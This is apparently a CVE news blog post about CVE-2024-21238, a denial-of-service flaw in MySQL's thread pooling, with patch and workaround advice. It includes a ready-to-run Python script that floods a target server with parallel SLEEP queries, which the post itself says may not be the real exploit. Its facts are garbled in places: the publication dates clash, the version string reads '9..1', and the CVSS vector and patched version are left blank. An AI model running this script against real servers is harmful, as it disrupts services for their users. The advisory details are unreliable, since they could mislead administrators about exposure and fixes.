CVE CyberSecurity Database News

CVE-2024-21238 - Breaking Down the MySQL Thread Pooling DOS Vulnerability

Poster -

---

MySQL is one of the world’s most popular open-source databases, powering everything from small blogs to large-scale enterprise applications. In June 2024, Oracle published information regarding a new denial-of-service (DOS) vulnerability in MySQL Server, tracked as CVE-2024-21238. This flaw affects several MySQL releases and can let a low-privileged attacker with network access crash or hang the entire server—representing a major risk for anyone running MySQL in production environments.

In this post, we’ll break down what this vulnerability is, how it can be exploited, and how you can protect your MySQL instances.

What is CVE-2024-21238?

According to Oracle’s security advisory, CVE-2024-21238 is a denial-of-service (DoS) flaw in the MySQL Server, specifically in the Thread Pooling component. Thread Pooling helps MySQL efficiently handle many connections at once by distributing client requests among a set of reusable threads.

MySQL 9..1 and earlier

Severity:

CVSS 3.1 Base Score: 5.3 (Medium)

- CVSS Vector:

How Does the Vulnerability Work?

The flaw exists in the thread pooling logic. In certain situations, a low-privileged user connected through the network can trigger a logic problem in how threads are managed. The attacker doesn’t need to be an admin—any user with basic connection permissions may be able to trigger the bug through multiple MySQL client protocols.

By sending carefully crafted requests, they can make the server hang or repeatedly crash, resulting in a full denial of service. What makes this dangerous is the fact that only network-level access and a working login (any non-admin user) are required.

Technical Details and Exploit Example

Oracle, as usual, hasn't published full proof-of-concept (PoC) code, but based on available details and MySQL’s bug handling, here’s a simplified explanation and code structure that could be used by a researcher to test affected systems. This is for educational use only!

Key Concept: Racing Threads to Exhaust Pool

A typical attack might involve several parallel connections from the attacker, intentionally sending requests designed to tie up all threads in the pool. If the thread pool management has logic flaws (e.g., improper cleanup, deadlock, or resource exhaustion), it might stop serving requests for all clients or even crash.

Here’s a Python snippet demonstrating a basic approach to attempt DoS against a MySQL instance with thread pooling enabled:

import pymysql
import threading

MYSQL_HOST = 'target.mysql.server'
MYSQL_PORT = 3306
MYSQL_USER = 'lowprivuser'
MYSQL_PASS = 'password'
NUM_THREADS = 100  # Increase to match/overwhelm thread pool size

def lock_thread_pool():
    try:
        conn = pymysql.connect(
            host=MYSQL_HOST,
            port=MYSQL_PORT,
            user=MYSQL_USER,
            password=MYSQL_PASS,
            connect_timeout=5,
            autocommit=True
        )
        cur = conn.cursor()
        # This could be any long-running, resource-hogging query
        cur.execute("SELECT SLEEP(100);")
    except Exception as e:
        print("Error:", e)

threads = []
for _ in range(NUM_THREADS):
    t = threading.Thread(target=lock_thread_pool)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

What does this do?

Starts many connections, each running a long-running operation (SELECT SLEEP(100)).

- If the thread pool isn’t properly handling thread exhaustion or cleanup, this could hang or crash the server.

Note: The *real* exploit for CVE-2024-21238 may require more nuanced or differently crafted requests, but this sample demonstrates the general category of the bug.

How to Fix

- Update MySQL: As of July 2024, Oracle’s patch removes the vulnerability (see CPU July 2024 Advisory). Upgrade MySQL to:

Restrict network access to the MySQL server.

- Only allow trusted IPs/connections.

Temporary Workarounds:

- If you can’t patch immediately, consider disabling thread pooling by setting thread_handling=one-thread-per-connection in your my.cnf file. Restart MySQL for the change to take effect.

References

- Oracle CPU July 2024 Security Advisory
- NIST NVD – CVE-2024-21238 entry
- MySQL Thread Pool Documentation
- Common MySQL DOS Techniques – Research

Conclusion

CVE-2024-21238 is a strong reminder that even non-root users on your database can potentially bring down your whole environment. If you’re running MySQL with thread pooling enabled, now is the time to patch. For those who cannot patch right away, limit users, restrict network access, and where possible, turn thread pooling off until you can update. With critical infrastructure, every minute counts—update your servers today.

Timeline

Published on: 10/15/2024 20:15:13 UTC
Last modified on: 10/16/2024 20:40:07 UTC